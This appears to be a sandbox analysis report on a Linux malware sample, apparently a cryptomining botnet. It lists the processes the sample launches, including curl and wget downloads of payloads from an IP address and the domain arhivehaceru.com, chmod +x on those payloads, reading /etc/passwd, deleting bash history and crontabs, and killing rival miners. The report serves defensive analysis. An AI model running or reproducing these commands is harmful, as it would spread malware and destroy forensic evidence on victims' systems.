Technical Information
Malicious functions:
Removes itself
Launches processes:
- curl -s -L -O 45.88.67.94/network
- <SAMPLE_FULL_PATH> -c exec \x27<SAMPLE_FULL_PATH>\x27 \x22$@\x22 <SAMPLE_FULL_PATH>
- rm -rf /root/.bash_history
- chmod +x iplist ips iptemp retea
- grep -v false
- cat .usrs
- /usr/bin/pgrep pkill haiduc
- mkdir /dev/shm/.x
- chmod +x network
- sed 1d iptemp
- grep -v nologin
- cat ips
- rm -rf xmrig .diicot .black Opera
- curl -O -s -L arhivehaceru.com/payload
- rm -rf /dev/shm/retea /dev/shm/.magic
- wget -q 45.88.67.94/network
- uniq
- chmod +x .teaca
- /usr/bin/pgrep pkill Opera
- crontab -r
- /usr/bin/pgrep pkill xMEu
- grep -v sync
- sleep 3
- rm -rf .black xmrig.1
- grep 192.168
- rm -rf retea ips iptemp ips iplist
- /usr/bin/pgrep pkill java
- rm -rf .retea
- rm -rf pass
- cut -d: -f1
- /usr/bin/pgrep pkill xrx
- /usr/bin/mawk awk -F. {print $1\x22.\x22$2}
- wget -q arhivehaceru.com/payload
- /usr/bin/pgrep pkill blacku
- /usr/bin/pgrep pkill xmrig
- /usr/bin/mawk awk {print $1}
- cat retea
- mkdir /tmp/.tmp
- wget -q 45.88.67.94/ps
- <0x2f>
- rm -rf /dev/shm/.x /var/tmp/.update-logs /var/tmp/Documents /tmp/.tmp
- curl -s -L -O 45.88.67.94/ps
- grep 10.
- rm -rf /dev/shm/.x /root/retea iplist ips iptemp pass retea <SAMPLE_FULL_PATH> /root/run.sh /root/stdout.log /root/stub.sh
- grep -v halt
- cat /etc/passwd
- ip r
- grep -v shutdown
- rm -rf .bash_history /root/.bash_history
- /usr/bin/pgrep pkill cnrig
- chmod +x payload systemd-private-f0fd406c1a484a80879a20681d9207ef-systemd-logind.service-4ZZQFi systemd-private-f0fd406c1a484a80879a20681d9207ef-systemd-timesyncd.service-rlMSmi
- grep -c . .usrs
- grep 172.
- sleep 1
- chmod +x ps
Performs operations with the file system:
Modifies file access rights:
- /var/tmp/payload
- /var/tmp/systemd-private-f0fd406c1a484a80879a20681d9207ef-systemd-logind.service-4ZZQFi
- /var/tmp/systemd-private-f0fd406c1a484a80879a20681d9207ef-systemd-timesyncd.service-rlMSmi
- /dev/shm/.x/iplist
- /dev/shm/.x/ips
- /dev/shm/.x/iptemp
- /dev/shm/.x/retea
Creates folders:
- /tmp/.tmp
- /.x
Deletes folders:
- /.x
Creates or modifies files:
- /var/tmp/payload
- /dev/shm/.x/retea
- /dev/shm/.x/ips
- /dev/shm/.x/iptemp
- /dev/shm/.x/iplist
- /dev/shm/.x/.usrs
- /dev/shm/.x/pass
Deletes files:
- /root/.bash_history
- /.x/pass
- /.x/.usrs
- /.x/iplist
- /.x/iptemp
- /.x/ips
- /.x/retea
- /root/run.sh
- /root/stub.sh
Network activity:
Establishes connection:
- 8.#.8.8:53
- 12#.##.94.177:80
- 45.##.67.94:80
DNS ASK:
- ar####haceru.com
Sends data to the following servers:
- 12#.##.94.177:80
Receives data from the following servers:
- 12#.##.94.177:80
Other:
Collects OS information
Collects CPU information